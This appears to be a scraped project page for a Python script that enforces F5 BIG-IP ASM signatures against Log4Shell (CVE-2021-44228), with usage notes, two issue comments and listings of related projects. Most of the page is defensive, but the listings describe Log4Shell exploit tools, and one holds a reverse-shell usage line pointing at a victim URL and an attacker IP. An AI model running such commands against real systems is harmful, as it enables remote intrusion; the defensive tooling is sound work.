This enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device

Overview

f5-waf-enforce-sigs-CVE-2021-44228

This enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device

Overview

This script enforces all signatures present in the list below related to CVE-2021-44228 across all policies in blocking mode in the Adv. WAF/ASM.

sigs = ['200104768', '200104769', '200004450', '200004451','200004474','200104770','200104771']

https://support.f5.com/csp/article/K19026212

This was tested on BIG-IP ASM/Adv.WAF v15.x but I expect this to work in v13/v14/v16 as well.

Prerequisites

Python 3.7+

The host machine needs to have connection to the BIG-IP management interface.

How to Use

usage: f5-waf-enforce-sig-CVE-2021-44228 device

positional arguments:
  device      File with IP adrresses of the target BIG-IP devices separated by line
You might also like...
A Docker based LDAP RCE exploit demo for CVE-2021-44228 Log4Shell

log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description This demo Tomcat 8 server has a vulnerable app deployed on it and is also vulne

Simple Python 3 script to detect the
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)
Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)

log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk

Python3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines.
Python3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines.

Log4j_checker.py (CVE-2021-44228) Description This Python3 script tries to look for servers vulnerable to CVE-2021-44228, also known as Log4Shell, a v

Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228

log4j-honeypot-flask Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228 This can be

Tools for investigating Log4j CVE-2021-44228

Log4jTools Tools for investigating Log4j CVE-2021-44228 FetchPayload.py (Get java payload from ldap path provided in JNDI lookup). Example command: Re

Log4j2 CVE-2021-44228 revshell

Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At

Providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account.
Providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account.

We are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them

Log4j command generator: Generate commands for CVE-2021-44228
Log4j command generator: Generate commands for CVE-2021-44228

Log4j command generator Generate commands for CVE-2021-44228. Description The vulnerability exists due to the Log4j processor's handling of log messag

Comments
  • One request to update matching signatures

    One request to update matching signatures

    Hi,

    To improve this code, you can add required signatures in filter instead of loop on each signatures

    This URL matches all staging signatures matching IDs

    https:///mgmt/tm/asm/policies//signatures?$expand=signatureReference&$filter=inPolicy+eq+true+and+performStaging+eq+true+and+signature/signatureId+in('200104768','200104769','200004450','200004451','200004474','200104770','200104771')

    You can replace following lines

        # enforce each signature
        for s in sigs:
            url_cve_sigs  = 'https://%s/mgmt/tm/asm/policies/%s/signatures?$expand=signatureReference&$filter=inPolicy+eq+true+and+signature/signatureId+eq+\'%s\'' % (device,policy_id,s)
            r = bigip.patch(url_cve_sigs,payload_enfor)
            print("Status code for enforcement: " + str(r.status_code))
        
    

    by

        # enforce each signature
        url_cve_sigs  = 'https://%s/mgmt/tm/asm/policies/%s/signatures?$expand=signatureReference&$filter=inPolicy+eq+true+and+signature/signatureId+in+(\'%s\')' % (device,policy_id, "','".join(sigs))
        r = bigip.patch(url_cve_sigs,payload_enfor)
        print("Status code for enforcement: " + str(r.status_code))
        
    
    opened by stanislaspiron 2
  • error when executing script

    error when executing script

    Hello, when i run the script, the following error message appears :

    [ijjo5560@rcxxxxx1:Active:Standalone] f5-waf-enforce-sig-CVE-2021-44228-main # python f5-waf-enforce-sig-CVE-2021-44228.py device Enter your username: root Traceback (most recent call last): File "f5-waf-enforce-sig-CVE-2021-44228.py", line 123, in username = input('Enter your username: ') File "", line 1, in NameError: name 'root' is not defined

    Thank you for your help

    opened by endymion93 1
Owner
Ismael Gonçalves
Ismael Gonçalves
A small script to export all AWAF policies from a BIG-IP device

This script leverages BIG-IP iControl REST API to export ALL AWAF policies in the system and saves them locally. The policies can be exported in the following formats: xml, plc and json.

null 3 Feb 3, 2022
An All-In-One Pure Python PoC for CVE-2021-44228

Python Log4RCE An all-in-one pure Python3 PoC for CVE-2021-44228. Configure Replace the global variables at the top of the script to your configuratio

Alexandre Lavoie 178 Nov 9, 2022
DNSpooq - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685)

dnspooq DNSpooq PoC - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685) For educational purposes only Requirements Docker compo

Teppei Fukuda 80 Nov 28, 2022
Northwave Log4j CVE-2021-44228 checker

Northwave Log4j CVE-2021-44228 checker Friday 10 December 2021 a new Proof-of-Concept 1 addressing a Remote code Execution (RCE) vulnerability in the

Northwave 125 Dec 9, 2022
Scan your logs for CVE-2021-44228 related activity and report the attackers

jndiRep - CVE-2021-44228 Basically a bad grep on even worse drugs. search for malicious strings decode payloads print results to stdout or file report

js-on 2 Nov 24, 2022
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

Víctor García 187 Jan 3, 2023
Python script that sends CVE-2021-44228 log4j payload requests to url list

scan4log4j Python script that sends CVE-2021-44228 log4j payload requests to url list [VERY BETA] using Supply your url list to urls.txt Put your payl

elyesa 5 Nov 9, 2022
A proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228)

CVE-2021-44228 – Log4j RCE Unauthenticated About This is a proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228). This vulnerability

Pedro Havay 20 Nov 11, 2022
Ingest GreyNoise.io malicious feed for CVE-2021-44228 and apply null routes

log4j-nullroute Quick script to ingest IP feed from greynoise.io for log4j (CVE-2021-44228) and null route bad addresses. Works w/Cisco IOS-XE and Ari

Ryan 5 Sep 12, 2022
Mass Check Vulnerable Log4j CVE-2021-44228

Log4j-CVE-2021-44228 Mass Check Vulnerable Log4j CVE-2021-44228 Introduction Actually I just checked via Vulnerable Application from https://github.co

Justakazh 6 Dec 28, 2022